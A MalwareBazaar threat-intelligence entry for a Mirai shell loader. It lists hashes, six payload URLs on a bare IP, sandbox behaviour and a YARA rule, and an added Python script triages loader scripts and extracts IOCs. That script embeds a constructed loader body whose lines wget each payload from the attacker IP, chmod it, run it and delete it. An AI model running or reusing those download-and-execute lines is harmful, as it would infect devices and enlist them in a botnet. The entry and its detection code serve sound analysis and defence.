MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 6

SHA256 hash: a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb
SHA3-384 hash: cb8d37098e75e802f4dddf6d3b4952ed4713f1b0bfd21bd2f1c0a4f30864fccab6813ef7345fb8dd4a75bc6226a751a1
SHA1 hash: 3ec917df77e75af1fee9ed296271a39ab05203a1
MD5 hash: 9d0d812c8289022ef6661d245292cd71
humanhash: nine-twelve-beryllium-don
File name: po
Signature: Mirai
File size: 491 bytes
First seen: 2026-01-01 13:36:56 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 6:SdVbkbHI67VxKSe3DjdVQlcQhXdVeag7QtvG3VcFGNIF8QdVcf687Qvv0:6GDDm3DjdAMaguiVNIHGk0
TLSH: T1AEF05B9F2068EF13C1CC4E567AB6603F547183D91966075AFFE6409B54CD600376CD95
Magika: shell
Reporter: abuse_ch
Tags: sh
Payloads fetched by this script (URL, malware sample SHA256 hash, signature, tags):

URL                            Malware sample (SHA256 hash)                                       Signature  Tags
http://130.12.180.64/splmips   99119aaf01d3b317ca0e6cf7a8912f4980b6071211483242336795337cfe17e0   Mirai      elf mirai ua-wget
http://130.12.180.64/splmpsl   5a11b3bc9145663f668b8124d193fa6035534206318a29b53071c807bfceb2e0   Mirai      elf mirai ua-wget
http://130.12.180.64/splarm    d967f32dac513d1ea8f02c8137174c784fff987c887dff1bf0a2b8178e1624bc   Mirai      elf mirai ua-wget
http://130.12.180.64/splarm5   57672f91464676b6b331c8ed2dd675eb63d46e42c5e21358eb1ef1bccb5bba68   Mirai      elf mirai ua-wget
http://130.12.180.64/splarm6   b12c8efcac2af8b598c7075aeb2df78e8d373fd27c15013046a4ead6289a5f49   Mirai      elf mirai ua-wget
http://130.12.180.64/splarm7   ccb58d3643e5813f781813ab9e5348702f68b146a93ec3cfb0c35879f0837f17   Mirai      elf mirai ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 39
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive mirai

Verdict: Malicious
File Type: text
First seen: 2026-01-01T14:21:00Z UTC
Last seen: 2026-01-02T02:59:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (sandbox process tree, condensed):
/usr/bin/sudo (pid 3342)
  execve -> /tmp/sample.bin (pid 3349)
    execve -> /usr/bin/wget   [net, send-data, write-file]  (pid 3350)
    execve -> /usr/bin/chmod                                (pid 3366)
    clone  -> /usr/bin/dash                                 (pid 3369)
    execve -> /usr/bin/rm     [delete-file]                 (pid 3370)
    ... the wget -> chmod -> dash -> rm sequence repeats six times in all
        (wget pids 3350, 3373, 3395, 3419, 3437, 3459; chmod pids 3366, 3391, 3414, 3431, 3454, 3479;
         dash pids 3369, 3393, 3416, 3434, 3456, 3481; rm pids 3370, 3394, 3417, 3435, 3457, 3483)
    execve -> /usr/bin/rm (pid 3484), final cleanup
Network: each of the six wget processes connected to 130.12.180.64:80 and sent one request of 134-135 bytes.
Threat name: Document-HTML.Downloader.Heuristic
Status: Malicious
First seen: 2026-01-01 14:20:18 UTC
File Type: Text (Shell)
AV detection: 8 of 24 (33.33%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Enumerates physical storage devices
(These three behaviours are Windows API observations from this vendor's sandbox; they do not describe what a POSIX shell script does on a Linux/IoT host, so weigh the Linux sandbox process tree above rather than this list when triaging.)
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
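The rule above is technique-based: it keys on the download-from-a-bare-IP, chmod, execute, multi-architecture pattern, which is also what the sandbox process tree in the Intelligence section records (six wget -> chmod -> dash -> rm rounds against 130.12.180.64:80). The Python script below is an added example, not MalwareBazaar's or the rule author's code, that applies the same heuristics to a loader script and pulls out the IOCs a responder would block. The script text it analyses is constructed (the sample's own body is not reproduced on this page) in the classic Mirai loader layout; the six download URLs in it are the ones from this entry's IOC table. The names analyze_loader, LoaderReport and the verdict strings are this example's own.

```python
"""Technique-based triage of an IoT/Linux botnet loader shell script.

Added example (not MalwareBazaar's or the YARA rule author's code). It checks
the same markers the rule description lists: downloads from numeric IPs, chmod,
execution of multi-architecture payloads, plus the per-payload rm cleanup seen
in the sandbox process tree. Standard library only.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample (assumption): the entry's own script text is not on the
# page, so this body follows the usual Mirai loader layout. The six URLs are
# the ones from this entry's IOC table.
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.12.180.64/splmips; chmod +x splmips; ./splmips; rm -rf splmips
wget http://130.12.180.64/splmpsl; chmod +x splmpsl; ./splmpsl; rm -rf splmpsl
wget http://130.12.180.64/splarm; chmod +x splarm; ./splarm; rm -rf splarm
wget http://130.12.180.64/splarm5; chmod +x splarm5; ./splarm5; rm -rf splarm5
wget http://130.12.180.64/splarm6; chmod +x splarm6; ./splarm6; rm -rf splarm6
wget http://130.12.180.64/splarm7; chmod +x splarm7; ./splarm7; rm -rf splarm7
rm -rf splmips splmpsl splarm splarm5 splarm6 splarm7
"""

# A wget/curl invocation whose target is an http(s) URL with a bare IPv4 host.
NUMERIC_URL_RE = re.compile(
    r"\b(?:wget|curl)\b[^\n;&|]*?"
    r"(?P<url>https?://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/(?P<path>[^\s;&|'\"]*))"
)
# chmod +x or a numeric mode; both are how loaders make the payload executable.
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")

# Payload-name substring -> architecture family, checked in order (mpsl before mips).
ARCH_HINTS = (
    ("mpsl", "mipsel"), ("mips", "mips"), ("arm", "arm"), ("x86", "x86"),
    ("i686", "x86"), ("i586", "x86"), ("ppc", "powerpc"), ("sh4", "sh4"),
    ("m68k", "m68k"),
)


def arch_of(name: str) -> Optional[str]:
    """Guess the target architecture family from a payload file name."""
    low = name.lower()
    for needle, arch in ARCH_HINTS:
        if needle in low:
            return arch
    return None


@dataclass
class LoaderReport:
    urls: List[str] = field(default_factory=list)
    ips: List[str] = field(default_factory=list)
    public_ips: List[str] = field(default_factory=list)   # routable, worth blocking
    payloads: List[str] = field(default_factory=list)     # file names fetched
    archs: List[str] = field(default_factory=list)        # distinct arch families
    has_chmod: bool = False
    executed: int = 0      # payloads launched as ./name
    cleaned: int = 0       # payloads removed again with rm -f / rm -rf
    verdict: str = "benign"


def analyze_loader(script: str) -> LoaderReport:
    """Extract IOCs and decide whether the script shows the loader technique."""
    rep = LoaderReport()
    for m in NUMERIC_URL_RE.finditer(script):
        rep.urls.append(m.group("url"))
        if m.group("ip") not in rep.ips:
            rep.ips.append(m.group("ip"))
        rep.payloads.append(m.group("path").rsplit("/", 1)[-1])
    rep.public_ips = [ip for ip in rep.ips if ipaddress.ip_address(ip).is_global]
    rep.archs = sorted({a for a in map(arch_of, rep.payloads) if a})
    rep.has_chmod = bool(CHMOD_RE.search(script))
    for name in rep.payloads:
        esc = re.escape(name)
        if re.search(r"(?:^|[\s;&|])\./" + esc + r"(?=$|[\s;&|])", script, re.M):
            rep.executed += 1
        if re.search(r"\brm\s+-r?f\s(?:[^\n]*\s)?" + esc + r"(?=$|\s)", script, re.M):
            rep.cleaned += 1
    # Download from a bare IP + chmod + execute is the loader technique itself;
    # a numeric-IP download on its own is only suspicious.
    if rep.urls and rep.has_chmod and rep.executed:
        rep.verdict = "iot-botnet-loader"
    elif rep.urls:
        rep.verdict = "suspicious-download"
    return rep


if __name__ == "__main__":
    r = analyze_loader(SAMPLE_SCRIPT)
    print(r.verdict, r.public_ips, r.archs, "executed:", r.executed, "cleaned:", r.cleaned)
    for url in r.urls:
        print("download:", url)
```

Run directly, it prints the verdict, the routable contact IP, the architecture families and the six download URLs. The verdict deliberately requires all three of download, chmod and execute, so an installer that merely fetches a tarball from an IP-addressed mirror is reported as suspicious rather than as a loader.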

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method   Signature   File type   Malware sample (SHA256 hash)
Web download      Mirai       sh          a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb (this sample)

Delivery method: Distributed via web download
